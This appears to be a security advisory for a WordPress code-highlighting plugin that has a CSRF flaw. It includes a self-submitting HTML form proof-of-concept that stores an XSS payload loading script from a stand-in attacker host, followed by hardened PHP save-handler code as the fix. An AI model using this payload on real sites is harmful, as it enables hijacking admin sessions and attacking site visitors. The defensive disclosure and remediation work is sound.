Lack of CSRF checks when saving the plugin settings could allow attackers to make a logged-in admin create XSS payloads.
<form id="hljs" name="hljs" method="post" action="https://example.com/wp-admin/options-general.php?page=wp-code-highlight-js">
<input type="hidden" name="hljs_location" value="local">
<input type="hidden" name="hljs_package" value="common">
<input type="hidden" name="hljs_theme" value="default">
<input type="hidden" name="hljs_additional_css" value="</style><script src=&quot;https://attacker.com/poc.js&quot;></script>">
<input type="hidden" name="cmd" value="hljs_save">
<input type="submit" value="Submit">
</form>
<script>
document.getElementById('hljs').submit();
</script>
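
The fix for this class of issue is a nonce check plus a capability check on the save handler, with the CSS field stripped of markup before it is stored and again when it is printed. The sketch below is an added example, not the plugin's own code: the field names and the `hljs_save` command come from the form above, while the function names, nonce names, option names and the use of `wp_head` are assumptions.

```php
<?php
// Added example: hypothetical hardened save handler, not the plugin's code.
// Field names are taken from the PoC form; all hljs_example_* names and the
// option names (assumed equal to the field names) are illustrative.

// Call inside the settings <form> so legitimate submissions carry a nonce.
function hljs_example_render_nonce() {
    wp_nonce_field( 'hljs_example_save', 'hljs_example_nonce' );
}

function hljs_example_handle_save() {
    if ( ! isset( $_POST['cmd'] ) || 'hljs_save' !== $_POST['cmd'] ) {
        return;
    }
    // Only administrators may change the plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Dies when the nonce is missing or invalid. A cross-site auto-submitted
    // form cannot include it, because the attacker's page cannot read it.
    check_admin_referer( 'hljs_example_save', 'hljs_example_nonce' );

    // Simple identifiers: restrict to lowercase letters, digits, "_" and "-".
    foreach ( array( 'hljs_location', 'hljs_package', 'hljs_theme' ) as $field ) {
        if ( isset( $_POST[ $field ] ) ) {
            update_option( $field, sanitize_key( wp_unslash( $_POST[ $field ] ) ) );
        }
    }
    if ( isset( $_POST['hljs_additional_css'] ) ) {
        // Strip tags so the value cannot close <style> and open <script>.
        $css = wp_strip_all_tags( wp_unslash( $_POST['hljs_additional_css'] ) );
        update_option( 'hljs_additional_css', $css );
    }
}
add_action( 'admin_init', 'hljs_example_handle_save' );

// Output side: sanitize again in case an older value was stored unsanitized.
function hljs_example_print_css() {
    $css = wp_strip_all_tags( (string) get_option( 'hljs_additional_css', '' ) );
    echo '<style>' . str_ireplace( '</style', '', $css ) . '</style>';
}
add_action( 'wp_head', 'hljs_example_print_css' );
```

With the nonce check in place the auto-submitting form above is rejected before any option is written, and the output-side stripping covers values saved before the fix.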